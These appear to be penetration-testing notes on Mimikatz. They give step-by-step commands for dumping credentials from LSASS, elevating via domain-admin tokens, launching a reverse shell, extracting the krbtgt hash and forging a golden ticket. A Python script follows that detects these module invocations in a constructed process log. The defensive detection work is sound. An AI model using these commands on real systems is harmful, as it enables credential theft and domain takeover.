<aside> 📌 Summary
</aside>
Mimikatz is a potent post-exploitation tool used by attackers to extract credentials, including plaintext passwords and Kerberos tickets, from the memory of Windows systems. It enables techniques such as Pass-the-Hash, Pass-the-Ticket and Overpass-the-Hash, which grant unauthorized access. Attackers run Mimikatz after compromising a system to escalate privileges, move laterally and access sensitive data.
When using mimikatz.exe, import all the necessary DLLs. Then, in the interface, first run privilege::debug to obtain the privileges needed for dumping.
sekurlsa::

sekurlsa::logonPasswords: the output contains hashes to crack and, sometimes, cleartext passwords.

Using Mimikatz, we'll take a look at the token module.
First, we need to check privileges with privilege::debug.
Then we can start listing available tokens:
token::list

Among them we find some domain administrator tokens.

Then we can elevate privileges with the following:
token::elevate /domainadmin
token::run /process:"C:\\someReverseShell.exe"
Once Mimikatz is loaded, we check privileges with privilege::debug. Then we can retrieve the domain's SID and the krbtgt hash with:
lsadump::lsa /inject /name:krbtgt

Then we use the kerberos module:
kerberos::golden /User:Administrator /domain:ORB.local /sid:<SID> /krbtgt:<Hash> /id:500 /ptt
kerberos::golden /User:Administrator /domain:ORB.local /sid:S-1-5-21-1854181339-1499107752-1584228225 /krbtgt:bd4fa474174f84467b4b05dd3ec0bcf1 /id:500 /ptt
/User: no need to use a real user, any string will work.
/id: the RID.
/ptt: pass the ticket into the session.
Then (when on an RDP session), run the following command to get a shell with the golden ticket:
misc::cmd
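From the defender's side, the module invocations listed in these notes (privilege::debug, sekurlsa::logonPasswords, token::list/elevate/run, lsadump::lsa, kerberos::golden with /ptt, misc::cmd) are also what shows up in process-creation telemetry when Mimikatz is driven from the command line. The following Python script is an added example, not part of the original notes or of Mimikatz itself: it scans a constructed, pipe-delimited process-creation log (timestamp|host|user|image|command line, a made-up flattened format rather than real Sysmon or Security-log output) for those module names, rates each hit, and flags a kerberos::golden call that carries /ptt as a forged ticket injected into the session. The SID and krbtgt values in the sample are placeholders.

```python
import re
from dataclasses import dataclass, field

# Mimikatz module commands from the notes above, with the action each performs.
# Matched case-insensitively: Mimikatz accepts logonPasswords and logonpasswords alike.
MIMIKATZ_MODULES = {
    "privilege::debug": "request debug privilege (precedes LSASS access)",
    "sekurlsa::logonpasswords": "dump credentials from LSASS memory",
    "token::list": "enumerate logon tokens",
    "token::elevate": "impersonate a privileged token",
    "token::run": "run a process under an impersonated token",
    "lsadump::lsa": "dump domain secrets such as the krbtgt hash",
    "kerberos::golden": "forge a Kerberos TGT (golden ticket)",
    "misc::cmd": "spawn cmd.exe from Mimikatz",
}

MODULE_RE = re.compile("|".join(re.escape(m) for m in MIMIKATZ_MODULES), re.IGNORECASE)
PTT_RE = re.compile(r"/ptt\b", re.IGNORECASE)  # pass-the-ticket switch

CRITICAL = {"sekurlsa::logonpasswords", "lsadump::lsa", "kerberos::golden"}
HIGH = {"token::elevate", "token::run"}


@dataclass
class Finding:
    timestamp: str
    host: str
    user: str
    image: str
    modules: list = field(default_factory=list)
    golden_ticket_injected: bool = False
    severity: str = "medium"


def parse_line(line):
    """Split one constructed record: ts|host|user|image|command line (5 fields)."""
    parts = line.rstrip("\n").split("|", 4)
    if len(parts) != 5:
        return None  # malformed record: skip it rather than abort the whole scan
    ts, host, user, image, cmdline = parts
    return {"ts": ts, "host": host, "user": user, "image": image, "cmdline": cmdline}


def analyse(event):
    """Return a Finding if the command line invokes Mimikatz modules, else None."""
    cmdline = event["cmdline"]
    modules = sorted({m.lower() for m in MODULE_RE.findall(cmdline)})
    if not modules:
        return None
    # kerberos::golden together with /ptt means a forged TGT was injected into the session
    golden = "kerberos::golden" in modules and PTT_RE.search(cmdline) is not None
    if golden or CRITICAL & set(modules):
        severity = "critical"
    elif HIGH & set(modules):
        severity = "high"
    else:
        severity = "medium"
    return Finding(event["ts"], event["host"], event["user"], event["image"],
                   modules, golden, severity)


def scan(lines):
    """Run parse + analyse over every record and collect the findings."""
    findings = []
    for line in lines:
        event = parse_line(line)
        if event is not None:
            finding = analyse(event)
            if finding is not None:
                findings.append(finding)
    return findings


# Constructed sample records (not real telemetry). The binary is renamed on the
# later lines, which is why matching targets the command line, not the image name.
SAMPLE_LOG = [
    "2024-01-01T10:00:00Z|WS01|ORB\\alice|C:\\Windows\\notepad.exe|notepad.exe report.txt",
    "2024-01-01T10:05:00Z|WS01|ORB\\bob|C:\\Users\\bob\\AppData\\Local\\Temp\\svc.exe|"
    "svc.exe \"privilege::debug\" \"sekurlsa::logonPasswords\" exit",
    "2024-01-01T10:07:00Z|WS01|ORB\\bob|C:\\Users\\bob\\AppData\\Local\\Temp\\svc.exe|"
    "svc.exe \"privilege::debug\" \"token::list\" exit",
    "2024-01-01T10:09:00Z|DC01|ORB\\bob|C:\\Temp\\m.exe|"
    "m.exe \"lsadump::lsa /inject /name:krbtgt\" exit",
    "2024-01-01T10:12:00Z|WS01|ORB\\bob|C:\\Temp\\m.exe|"
    "m.exe \"kerberos::golden /User:Administrator /domain:ORB.local "
    "/sid:S-1-5-21-PLACEHOLDER /krbtgt:PLACEHOLDER_HASH /id:500 /ptt\" \"misc::cmd\" exit",
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        actions = "; ".join(MIMIKATZ_MODULES[m] for m in f.modules)
        tail = " (golden ticket injected)" if f.golden_ticket_injected else ""
        print(f"[{f.severity.upper()}] {f.timestamp} {f.host} {f.user} {f.image}: {actions}{tail}")
```

The matching is deliberately keyed on the command line rather than the file name, since the binary is routinely renamed; the trade-off is that an interactive Mimikatz session (commands typed at the prompt, as in the notes) or a reflectively loaded copy leaves no such command line, so this check should sit alongside telemetry on LSASS access and on unusual Kerberos ticket use rather than replace it.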